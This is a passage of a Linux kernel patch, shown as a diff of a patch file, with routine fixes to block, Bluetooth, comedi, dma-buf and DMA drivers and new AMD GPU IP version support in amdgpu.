+diff --git a/drivers/block/pktcdvd.c b/drivers/block/pktcdvd.c
+index 4cea3b08087ed..2f1a92509271c 100644
+--- a/drivers/block/pktcdvd.c
++++ b/drivers/block/pktcdvd.c
+@@ -2400,6 +2400,8 @@ static void pkt_submit_bio(struct bio *bio)
+ 	struct bio *split;
+ 
+ 	bio = bio_split_to_limits(bio);
++	if (!bio)
++		return;
+ 
+ 	pkt_dbg(2, pd, "start = %6llx stop = %6llx\n",
+ 		(unsigned long long)bio->bi_iter.bi_sector,
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index bae9b2a408d95..e4398590b0edc 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -2157,10 +2157,17 @@ static void qca_serdev_shutdown(struct device *dev)
+ 	int timeout = msecs_to_jiffies(CMD_TRANS_TIMEOUT_MS);
+ 	struct serdev_device *serdev = to_serdev_device(dev);
+ 	struct qca_serdev *qcadev = serdev_device_get_drvdata(serdev);
++	struct hci_uart *hu = &qcadev->serdev_hu;
++	struct hci_dev *hdev = hu->hdev;
++	struct qca_data *qca = hu->priv;
+ 	const u8 ibs_wake_cmd[] = { 0xFD };
+ 	const u8 edl_reset_soc_cmd[] = { 0x01, 0x00, 0xFC, 0x01, 0x05 };
+ 
+ 	if (qcadev->btsoc_type == QCA_QCA6390) {
++		if (test_bit(QCA_BT_OFF, &qca->flags) ||
++		    !test_bit(HCI_RUNNING, &hdev->flags))
++			return;
++
+ 		serdev_device_write_flush(serdev);
+ 		ret = serdev_device_write_buf(serdev, ibs_wake_cmd,
+ 					      sizeof(ibs_wake_cmd));
+diff --git a/drivers/comedi/drivers/adv_pci1760.c b/drivers/comedi/drivers/adv_pci1760.c
+index fcfc2e299110e..27f3890f471df 100644
+--- a/drivers/comedi/drivers/adv_pci1760.c
++++ b/drivers/comedi/drivers/adv_pci1760.c
+@@ -58,7 +58,7 @@
+ #define PCI1760_CMD_CLR_IMB2		0x00	/* Clears IMB2 */
+ #define PCI1760_CMD_SET_DO		0x01	/* Set output state */
+ #define PCI1760_CMD_GET_DO		0x02	/* Read output status */
+-#define PCI1760_CMD_GET_STATUS		0x03	/* Read current status */
++#define PCI1760_CMD_GET_STATUS		0x07	/* Read current status */
+ #define PCI1760_CMD_GET_FW_VER		0x0e	/* Read firmware version */
+ #define PCI1760_CMD_GET_HW_VER		0x0f	/* Read hardware version */
+ #define PCI1760_CMD_SET_PWM_HI(x)	(0x10 + (x) * 2) /* Set "hi" period */
+diff --git a/drivers/dma-buf/dma-buf-sysfs-stats.c b/drivers/dma-buf/dma-buf-sysfs-stats.c
+index 2bba0babcb62b..4b680e10c15a3 100644
+--- a/drivers/dma-buf/dma-buf-sysfs-stats.c
++++ b/drivers/dma-buf/dma-buf-sysfs-stats.c
+@@ -168,14 +168,11 @@ void dma_buf_uninit_sysfs_statistics(void)
+ 	kset_unregister(dma_buf_stats_kset);
+ }
+ 
+-int dma_buf_stats_setup(struct dma_buf *dmabuf)
++int dma_buf_stats_setup(struct dma_buf *dmabuf, struct file *file)
+ {
+ 	struct dma_buf_sysfs_entry *sysfs_entry;
+ 	int ret;
+ 
+-	if (!dmabuf || !dmabuf->file)
+-		return -EINVAL;
+-
+ 	if (!dmabuf->exp_name) {
+ 		pr_err("exporter name must not be empty if stats needed\n");
+ 		return -EINVAL;
+@@ -192,7 +189,7 @@ int dma_buf_stats_setup(struct dma_buf *dmabuf)
+ 
+ 	/* create the directory for buffer stats */
+ 	ret = kobject_init_and_add(&sysfs_entry->kobj, &dma_buf_ktype, NULL,
+-				   "%lu", file_inode(dmabuf->file)->i_ino);
++				   "%lu", file_inode(file)->i_ino);
+ 	if (ret)
+ 		goto err_sysfs_dmabuf;
+ 
+diff --git a/drivers/dma-buf/dma-buf-sysfs-stats.h b/drivers/dma-buf/dma-buf-sysfs-stats.h
+index a49c6e2650ccc..7a8a995b75bae 100644
+--- a/drivers/dma-buf/dma-buf-sysfs-stats.h
++++ b/drivers/dma-buf/dma-buf-sysfs-stats.h
+@@ -13,7 +13,7 @@
+ int dma_buf_init_sysfs_statistics(void);
+ void dma_buf_uninit_sysfs_statistics(void);
+ 
+-int dma_buf_stats_setup(struct dma_buf *dmabuf);
++int dma_buf_stats_setup(struct dma_buf *dmabuf, struct file *file);
+ 
+ void dma_buf_stats_teardown(struct dma_buf *dmabuf);
+ #else
+@@ -25,7 +25,7 @@ static inline int dma_buf_init_sysfs_statistics(void)
+ 
+ static inline void dma_buf_uninit_sysfs_statistics(void) {}
+ 
+-static inline int dma_buf_stats_setup(struct dma_buf *dmabuf)
++static inline int dma_buf_stats_setup(struct dma_buf *dmabuf, struct file *file)
+ {
+ 	return 0;
+ }
+diff --git a/drivers/dma-buf/dma-buf.c b/drivers/dma-buf/dma-buf.c
+index e6f36c014c4cd..eb6b59363c4f5 100644
+--- a/drivers/dma-buf/dma-buf.c
++++ b/drivers/dma-buf/dma-buf.c
+@@ -95,10 +95,11 @@ static int dma_buf_file_release(struct inode *inode, struct file *file)
+ 		return -EINVAL;
+ 
+ 	dmabuf = file->private_data;
+-
+-	mutex_lock(&db_list.lock);
+-	list_del(&dmabuf->list_node);
+-	mutex_unlock(&db_list.lock);
++	if (dmabuf) {
++		mutex_lock(&db_list.lock);
++		list_del(&dmabuf->list_node);
++		mutex_unlock(&db_list.lock);
++	}
+ 
+ 	return 0;
+ }
+@@ -523,17 +524,17 @@ static inline int is_dma_buf_file(struct file *file)
+ 	return file->f_op == &dma_buf_fops;
+ }
+ 
+-static struct file *dma_buf_getfile(struct dma_buf *dmabuf, int flags)
++static struct file *dma_buf_getfile(size_t size, int flags)
+ {
+ 	static atomic64_t dmabuf_inode = ATOMIC64_INIT(0);
+-	struct file *file;
+ 	struct inode *inode = alloc_anon_inode(dma_buf_mnt->mnt_sb);
++	struct file *file;
+ 
+ 	if (IS_ERR(inode))
+ 		return ERR_CAST(inode);
+ 
+-	inode->i_size = dmabuf->size;
+-	inode_set_bytes(inode, dmabuf->size);
++	inode->i_size = size;
++	inode_set_bytes(inode, size);
+ 
+ 	/*
+ 	 * The ->i_ino acquired from get_next_ino() is not unique thus
+@@ -547,8 +548,6 @@ static struct file *dma_buf_getfile(struct dma_buf *dmabuf, int flags)
+ 				 flags, &dma_buf_fops);
+ 	if (IS_ERR(file))
+ 		goto err_alloc_file;
+-	file->private_data = dmabuf;
+-	file->f_path.dentry->d_fsdata = dmabuf;
+ 
+ 	return file;
+ 
+@@ -614,19 +613,11 @@ struct dma_buf *dma_buf_export(const struct dma_buf_export_info *exp_info)
+ 	size_t alloc_size = sizeof(struct dma_buf);
+ 	int ret;
+ 
+-	if (!exp_info->resv)
+-		alloc_size += sizeof(struct dma_resv);
+-	else
+-		/* prevent &dma_buf[1] == dma_buf->resv */
+-		alloc_size += 1;
+-
+-	if (WARN_ON(!exp_info->priv
+-			  || !exp_info->ops
+-			  || !exp_info->ops->map_dma_buf
+-			  || !exp_info->ops->unmap_dma_buf
+-			  || !exp_info->ops->release)) {
++	if (WARN_ON(!exp_info->priv || !exp_info->ops
++		    || !exp_info->ops->map_dma_buf
++		    || !exp_info->ops->unmap_dma_buf
++		    || !exp_info->ops->release))
+ 		return ERR_PTR(-EINVAL);
+-	}
+ 
+ 	if (WARN_ON(exp_info->ops->cache_sgt_mapping &&
+ 		    (exp_info->ops->pin || exp_info->ops->unpin)))
+@@ -638,10 +629,21 @@ struct dma_buf *dma_buf_export(const struct dma_buf_export_info *exp_info)
+ 	if (!try_module_get(exp_info->owner))
+ 		return ERR_PTR(-ENOENT);
+ 
++	file = dma_buf_getfile(exp_info->size, exp_info->flags);
++	if (IS_ERR(file)) {
++		ret = PTR_ERR(file);
++		goto err_module;
++	}
++
++	if (!exp_info->resv)
++		alloc_size += sizeof(struct dma_resv);
++	else
++		/* prevent &dma_buf[1] == dma_buf->resv */
++		alloc_size += 1;
+ 	dmabuf = kzalloc(alloc_size, GFP_KERNEL);
+ 	if (!dmabuf) {
+ 		ret = -ENOMEM;
+-		goto err_module;
++		goto err_file;
+ 	}
+ 
+ 	dmabuf->priv = exp_info->priv;
+@@ -653,44 +655,36 @@ struct dma_buf *dma_buf_export(const struct dma_buf_export_info *exp_info)
+ 	init_waitqueue_head(&dmabuf->poll);
+ 	dmabuf->cb_in.poll = dmabuf->cb_out.poll = &dmabuf->poll;
+ 	dmabuf->cb_in.active = dmabuf->cb_out.active = 0;
++	mutex_init(&dmabuf->lock);
++	INIT_LIST_HEAD(&dmabuf->attachments);
+ 
+ 	if (!resv) {
+-		resv = (struct dma_resv *)&dmabuf[1];
+-		dma_resv_init(resv);
++		dmabuf->resv = (struct dma_resv *)&dmabuf[1];
++		dma_resv_init(dmabuf->resv);
++	} else {
++		dmabuf->resv = resv;
+ 	}
+-	dmabuf->resv = resv;
+ 
+-	file = dma_buf_getfile(dmabuf, exp_info->flags);
+-	if (IS_ERR(file)) {
+-		ret = PTR_ERR(file);
++	ret = dma_buf_stats_setup(dmabuf, file);
++	if (ret)
+ 		goto err_dmabuf;
+-	}
+ 
++	file->private_data = dmabuf;
++	file->f_path.dentry->d_fsdata = dmabuf;
+ 	dmabuf->file = file;
+ 
+-	mutex_init(&dmabuf->lock);
+-	INIT_LIST_HEAD(&dmabuf->attachments);
+-
+ 	mutex_lock(&db_list.lock);
+ 	list_add(&dmabuf->list_node, &db_list.head);
+ 	mutex_unlock(&db_list.lock);
+ 
+-	ret = dma_buf_stats_setup(dmabuf);
+-	if (ret)
+-		goto err_sysfs;
+-
+ 	return dmabuf;
+ 
+-err_sysfs:
+-	/*
+-	 * Set file->f_path.dentry->d_fsdata to NULL so that when
+-	 * dma_buf_release() gets invoked by dentry_ops, it exits
+-	 * early before calling the release() dma_buf op.
+-	 */
+-	file->f_path.dentry->d_fsdata = NULL;
+-	fput(file);
+ err_dmabuf:
++	if (!resv)
++		dma_resv_fini(dmabuf->resv);
+ 	kfree(dmabuf);
++err_file:
++	fput(file);
+ err_module:
+ 	module_put(exp_info->owner);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+index a183d93bd7e29..bf85aa0979ecb 100644
+--- a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
++++ b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+@@ -1018,6 +1018,11 @@ static noinline void axi_chan_handle_err(struct axi_dma_chan *chan, u32 status)
+ 
+ 	/* The bad descriptor currently is in the head of vc list */
+ 	vd = vchan_next_desc(&chan->vc);
++	if (!vd) {
++		dev_err(chan2dev(chan), "BUG: %s, IRQ with no descriptors\n",
++			axi_chan_name(chan));
++		goto out;
++	}
+ 	/* Remove the completed descriptor from issued list */
+ 	list_del(&vd->node);
+ 
+@@ -1032,6 +1037,7 @@ static noinline void axi_chan_handle_err(struct axi_dma_chan *chan, u32 status)
+ 	/* Try to restart the controller */
+ 	axi_chan_start_first_queued(chan);
+ 
++out:
+ 	spin_unlock_irqrestore(&chan->vc.lock, flags);
+ }
+ 
+diff --git a/drivers/dma/idxd/device.c b/drivers/dma/idxd/device.c
+index 6f44fa8f78a5d..6d8ff664fdfb2 100644
+--- a/drivers/dma/idxd/device.c
++++ b/drivers/dma/idxd/device.c
+@@ -1173,8 +1173,19 @@ static void idxd_flush_pending_descs(struct idxd_irq_entry *ie)
+ 	spin_unlock(&ie->list_lock);
+ 
+ 	list_for_each_entry_safe(desc, itr, &flist, list) {
++		struct dma_async_tx_descriptor *tx;
++
+ 		list_del(&desc->list);
+ 		ctype = desc->completion->status ? IDXD_COMPLETE_NORMAL : IDXD_COMPLETE_ABORT;
++		/*
++		 * wq is being disabled. Any remaining descriptors are
++		 * likely to be stuck and can be dropped. callback could
++		 * point to code that is no longer accessible, for example
++		 * if dmatest module has been unloaded.
++		 */
++		tx = &desc->txd;
++		tx->callback = NULL;
++		tx->callback_result = NULL;
+ 		idxd_dma_complete_txd(desc, ctype, true);
+ 	}
+ }
+@@ -1391,8 +1402,7 @@ err_res_alloc:
+ err_irq:
+ 	idxd_wq_unmap_portal(wq);
+ err_map_portal:
+-	rc = idxd_wq_disable(wq, false);
+-	if (rc < 0)
++	if (idxd_wq_disable(wq, false))
+ 		dev_dbg(dev, "wq %s disable failed\n", dev_name(wq_confdev(wq)));
+ err:
+ 	return rc;
+@@ -1409,11 +1419,11 @@ void drv_disable_wq(struct idxd_wq *wq)
+ 		dev_warn(dev, "Clients has claim on wq %d: %d\n",
+ 			 wq->id, idxd_wq_refcount(wq));
+ 
+-	idxd_wq_free_resources(wq);
+ 	idxd_wq_unmap_portal(wq);
+ 	idxd_wq_drain(wq);
+ 	idxd_wq_free_irq(wq);
+ 	idxd_wq_reset(wq);
++	idxd_wq_free_resources(wq);
+ 	percpu_ref_exit(&wq->wq_active);
+ 	wq->type = IDXD_WQT_NONE;
+ 	wq->client_count = 0;
+diff --git a/drivers/dma/lgm/lgm-dma.c b/drivers/dma/lgm/lgm-dma.c
+index 9b9184f964be3..1709d159af7e0 100644
+--- a/drivers/dma/lgm/lgm-dma.c
++++ b/drivers/dma/lgm/lgm-dma.c
+@@ -914,7 +914,7 @@ static void ldma_dev_init(struct ldma_dev *d)
+ 	}
+ }
+ 
+-static int ldma_cfg_init(struct ldma_dev *d)
++static int ldma_parse_dt(struct ldma_dev *d)
+ {
+ 	struct fwnode_handle *fwnode = dev_fwnode(d->dev);
+ 	struct ldma_port *p;
+@@ -1661,10 +1661,6 @@ static int intel_ldma_probe(struct platform_device *pdev)
+ 		p->ldev = d;
+ 	}
+ 
+-	ret = ldma_cfg_init(d);
+-	if (ret)
+-		return ret;
+-
+ 	dma_dev->dev = &pdev->dev;
+ 
+ 	ch_mask = (unsigned long)d->channels_mask;
+@@ -1675,6 +1671,10 @@ static int intel_ldma_probe(struct platform_device *pdev)
+ 			ldma_dma_init_v3X(j, d);
+ 	}
+ 
++	ret = ldma_parse_dt(d);
++	if (ret)
++		return ret;
++
+ 	dma_dev->device_alloc_chan_resources = ldma_alloc_chan_resources;
+ 	dma_dev->device_free_chan_resources = ldma_free_chan_resources;
+ 	dma_dev->device_terminate_all = ldma_terminate_all;
+diff --git a/drivers/dma/tegra210-adma.c b/drivers/dma/tegra210-adma.c
+index ae39b52012b2f..79da93cc77b64 100644
+--- a/drivers/dma/tegra210-adma.c
++++ b/drivers/dma/tegra210-adma.c
+@@ -221,7 +221,7 @@ static int tegra_adma_init(struct tegra_adma *tdma)
+ 	int ret;
+ 
+ 	/* Clear any interrupts */
+-	tdma_write(tdma, tdma->cdata->global_int_clear, 0x1);
++	tdma_write(tdma, tdma->cdata->ch_base_offset + tdma->cdata->global_int_clear, 0x1);
+ 
+ 	/* Assert soft reset */
+ 	tdma_write(tdma, ADMA_GLOBAL_SOFT_RESET, 0x1);
+diff --git a/drivers/firmware/google/gsmi.c b/drivers/firmware/google/gsmi.c
+index 4e2575dfeb908..871bedf533a80 100644
+--- a/drivers/firmware/google/gsmi.c
++++ b/drivers/firmware/google/gsmi.c
+@@ -361,9 +361,10 @@ static efi_status_t gsmi_get_variable(efi_char16_t *name,
+ 		memcpy(data, gsmi_dev.data_buf->start, *data_size);
+ 
+ 		/* All variables are have the following attributes */
+-		*attr = EFI_VARIABLE_NON_VOLATILE |
+-			EFI_VARIABLE_BOOTSERVICE_ACCESS |
+-			EFI_VARIABLE_RUNTIME_ACCESS;
++		if (attr)
++			*attr = EFI_VARIABLE_NON_VOLATILE |
++				EFI_VARIABLE_BOOTSERVICE_ACCESS |
++				EFI_VARIABLE_RUNTIME_ACCESS;
+ 	}
+ 
+ 	spin_unlock_irqrestore(&gsmi_dev.lock, flags);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_discovery.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_discovery.c
+index 3993e61349141..d8441e273cb5d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_discovery.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_discovery.c
+@@ -1507,6 +1507,7 @@ static int amdgpu_discovery_set_common_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 		amdgpu_device_ip_block_add(adev, &soc21_common_ip_block);
+ 		break;
+ 	default:
+@@ -1551,6 +1552,7 @@ static int amdgpu_discovery_set_gmc_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 		amdgpu_device_ip_block_add(adev, &gmc_v11_0_ip_block);
+ 		break;
+ 	default:
+@@ -1636,6 +1638,7 @@ static int amdgpu_discovery_set_psp_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(13, 0, 7):
+ 	case IP_VERSION(13, 0, 8):
+ 	case IP_VERSION(13, 0, 10):
++	case IP_VERSION(13, 0, 11):
+ 		amdgpu_device_ip_block_add(adev, &psp_v13_0_ip_block);
+ 		break;
+ 	case IP_VERSION(13, 0, 4):
+@@ -1686,6 +1689,7 @@ static int amdgpu_discovery_set_smu_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(13, 0, 7):
+ 	case IP_VERSION(13, 0, 8):
+ 	case IP_VERSION(13, 0, 10):
++	case IP_VERSION(13, 0, 11):
+ 		amdgpu_device_ip_block_add(adev, &smu_v13_0_ip_block);
+ 		break;
+ 	default:
+@@ -1785,6 +1789,7 @@ static int amdgpu_discovery_set_gc_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 		amdgpu_device_ip_block_add(adev, &gfx_v11_0_ip_block);
+ 		break;
+ 	default:
+@@ -1948,6 +1953,7 @@ static int amdgpu_discovery_set_mes_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 		amdgpu_device_ip_block_add(adev, &mes_v11_0_ip_block);
+ 		adev->enable_mes = true;
+ 		adev->enable_mes_kiq = true;
+@@ -2177,6 +2183,7 @@ int amdgpu_discovery_set_ip_blocks(struct amdgpu_device *adev)
+ 		adev->family = AMDGPU_FAMILY_GC_11_0_0;
+ 		break;
+ 	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
+ 		adev->family = AMDGPU_FAMILY_GC_11_0_1;
+ 		break;
+ 	default:
+@@ -2194,6 +2201,7 @@ int amdgpu_discovery_set_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(10, 3, 6):
+ 	case IP_VERSION(10, 3, 7):
+ 	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
+ 		adev->flags |= AMD_IS_APU;
+ 		break;
+ 	default:
+@@ -2250,6 +2258,7 @@ int amdgpu_discovery_set_ip_blocks(struct amdgpu_device *adev)
+ 		adev->nbio.hdp_flush_reg = &nbio_v4_3_hdp_flush_reg;
+ 		break;
+ 	case IP_VERSION(7, 7, 0):
++	case IP_VERSION(7, 7, 1):
+ 		adev->nbio.funcs = &nbio_v7_7_funcs;
+ 		adev->nbio.hdp_flush_reg = &nbio_v7_7_hdp_flush_reg;
+ 		break;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+index 9546adc8a76f6..99f5e38c4835e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+@@ -156,6 +156,9 @@ static bool amdgpu_gfx_is_compute_multipipe_capable(struct amdgpu_device *adev)
+ 		return amdgpu_compute_multipipe == 1;
+ 	}
+ 
++	if (adev->ip_versions[GC_HWIP][0] > IP_VERSION(9, 0, 0))
++		return true;
++
+ 	/* FIXME: spreading the queues across pipes causes perf regressions
+ 	 * on POLARIS11 compute workloads */
+ 	if (adev->asic_type == CHIP_POLARIS11)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+index 28612e56d0d45..02a4c93673ce2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+@@ -548,6 +548,8 @@ void amdgpu_gmc_tmz_set(struct amdgpu_device *adev)
+ 	case IP_VERSION(10, 3, 1):
+ 	/* YELLOW_CARP*/
+ 	case IP_VERSION(10, 3, 3):
++	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
+ 		/* Don't enable it by default yet.
+ 		 */
+ 		if (amdgpu_tmz < 1) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c
+index adac650cf544a..3bf0e893c07df 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c
+@@ -154,8 +154,14 @@ void amdgpu_job_free_resources(struct amdgpu_job *job)
+ 	struct dma_fence *f;
+ 	unsigned i;
+ 
+-	/* use sched fence if available */
+-	f = job->base.s_fence ? &job->base.s_fence->finished :  &job->hw_fence;
++	/* Check if any fences where initialized */
++	if (job->base.s_fence && job->base.s_fence->finished.ops)
++		f = &job->base.s_fence->finished;
++	else if (job->hw_fence.ops)
++		f = &job->hw_fence;
++	else
++		f = NULL;
++
+ 	for (i = 0; i < job->num_ibs; ++i)
+ 		amdgpu_ib_free(ring->adev, &job->ibs[i], f);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 7978307e1d6d2..712dd72f3ccf2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -139,6 +139,7 @@ static int psp_early_init(void *handle)
+ 	case IP_VERSION(13, 0, 5):
+ 	case IP_VERSION(13, 0, 8):
+ 	case IP_VERSION(13, 0, 10):
++	case IP_VERSION(13, 0, 11):
+ 		psp_v13_0_set_psp_funcs(psp);
+ 		psp->autoload_supported = true;
+ 		break;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 0fecc5bf45bc5..3bf4f2edc1089 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -77,6 +77,10 @@ MODULE_FIRMWARE("amdgpu/gc_11_0_3_pfp.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_3_me.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_3_mec.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_3_rlc.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_pfp.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_me.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_mec.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_rlc.bin");
+ 
+ static const struct soc15_reg_golden golden_settings_gc_11_0_1[] =
+ {
+@@ -262,6 +266,7 @@ static void gfx_v11_0_init_golden_registers(struct amdgpu_device *adev)
+ {
+ 	switch (adev->ip_versions[GC_HWIP][0]) {
+ 	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
+ 		soc15_program_register_sequence(adev,
+ 						golden_settings_gc_11_0_1,
+ 						(const u32)ARRAY_SIZE(golden_settings_gc_11_0_1));
+@@ -856,6 +861,7 @@ static int gfx_v11_0_gpu_early_init(struct amdgpu_device *adev)
+ 		adev->gfx.config.sc_earlyz_tile_fifo_size = 0x4C0;
+ 		break;
+ 	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
+ 		adev->gfx.config.max_hw_contexts = 8;
+ 		adev->gfx.config.sc_prim_fifo_size_frontend = 0x20;
+ 		adev->gfx.config.sc_prim_fifo_size_backend = 0x100;
+@@ -1282,7 +1288,6 @@ static int gfx_v11_0_sw_init(void *handle)
+ 
+ 	switch (adev->ip_versions[GC_HWIP][0]) {
+ 	case IP_VERSION(11, 0, 0):
+-	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
+ 		adev->gfx.me.num_me = 1;
+@@ -1292,6 +1297,15 @@ static int gfx_v11_0_sw_init(void *handle)
+ 		adev->gfx.mec.num_pipe_per_mec = 4;
+ 		adev->gfx.mec.num_queue_per_pipe = 4;
+ 		break;
++	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
++		adev->gfx.me.num_me = 1;
++		adev->gfx.me.num_pipe_per_me = 1;
++		adev->gfx.me.num_queue_per_pipe = 1;
++		adev->gfx.mec.num_mec = 1;
++		adev->gfx.mec.num_pipe_per_mec = 4;
++		adev->gfx.mec.num_queue_per_pipe = 4;
++		break;
+ 	default:
+ 		adev->gfx.me.num_me = 1;
+ 		adev->gfx.me.num_pipe_per_me = 1;
+@@ -2486,7 +2500,8 @@ static int gfx_v11_0_wait_for_rlc_autoload_complete(struct amdgpu_device *adev)
+ 	for (i = 0; i < adev->usec_timeout; i++) {
+ 		cp_status = RREG32_SOC15(GC, 0, regCP_STAT);
+ 
+-		if (adev->ip_versions[GC_HWIP][0] == IP_VERSION(11, 0, 1))
++		if (adev->ip_versions[GC_HWIP][0] == IP_VERSION(11, 0, 1) ||
++				adev->ip_versions[GC_HWIP][0] == IP_VERSION(11, 0, 4))
+ 			bootload_status = RREG32_SOC15(GC, 0,
+ 					regRLC_RLCS_BOOTLOAD_STATUS_gc_11_0_1);
+ 		else
+@@ -5022,6 +5037,7 @@ static void gfx_v11_cntl_power_gating(struct amdgpu_device *adev, bool enable)
+ 	if (enable && (adev->pg_flags & AMD_PG_SUPPORT_GFX_PG)) {
+ 		switch (adev->ip_versions[GC_HWIP][0]) {
+ 		case IP_VERSION(11, 0, 1):
++		case IP_VERSION(11, 0, 4):
+ 			WREG32_SOC15(GC, 0, regRLC_PG_DELAY_3, RLC_PG_DELAY_3_DEFAULT_GC_11_0_1);
+ 			break;
+ 		default:
+@@ -5055,6 +5071,7 @@ static int gfx_v11_0_set_powergating_state(void *handle,
+ 		amdgpu_gfx_off_ctrl(adev, enable);
+ 		break;
+ 	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
+ 		gfx_v11_cntl_pg(adev, enable);
+ 		amdgpu_gfx_off_ctrl(adev, enable);
+ 		break;
+@@ -5078,6 +5095,7 @@ static int gfx_v11_0_set_clockgating_state(void *handle,
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 	        gfx_v11_0_update_gfx_clock_gating(adev,
+ 	                        state ==  AMD_CG_STATE_GATE);
+ 	        break;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+index 66dfb574cc7d1..96e0bb5bee78e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+@@ -749,6 +749,7 @@ static int gmc_v11_0_sw_init(void *handle)
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 		adev->num_vmhubs = 2;
+ 		/*
+ 		 * To fulfill 4-level page support,
+diff --git a/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c b/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c
+index 88f9b327183ab..8c5fa4b7b68a2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c
+@@ -46,6 +46,8 @@ MODULE_FIRMWARE("amdgpu/psp_13_0_7_sos.bin");
+ MODULE_FIRMWARE("amdgpu/psp_13_0_7_ta.bin");
+ MODULE_FIRMWARE("amdgpu/psp_13_0_10_sos.bin");
+ MODULE_FIRMWARE("amdgpu/psp_13_0_10_ta.bin");
++MODULE_FIRMWARE("amdgpu/psp_13_0_11_toc.bin");
++MODULE_FIRMWARE("amdgpu/psp_13_0_11_ta.bin");
+ 
+ /* For large FW files the time to complete can be very long */
+ #define USBC_PD_POLLING_LIMIT_S 240
+@@ -102,6 +104,7 @@ static int psp_v13_0_init_microcode(struct psp_context *psp)
+ 	case IP_VERSION(13, 0, 3):
+ 	case IP_VERSION(13, 0, 5):
+ 	case IP_VERSION(13, 0, 8):
++	case IP_VERSION(13, 0, 11):
+ 		err = psp_init_toc_microcode(psp, chip_name);
+ 		if (err)
+ 			return err;
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 909cf9f220c19..9bc9852b9cda9 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
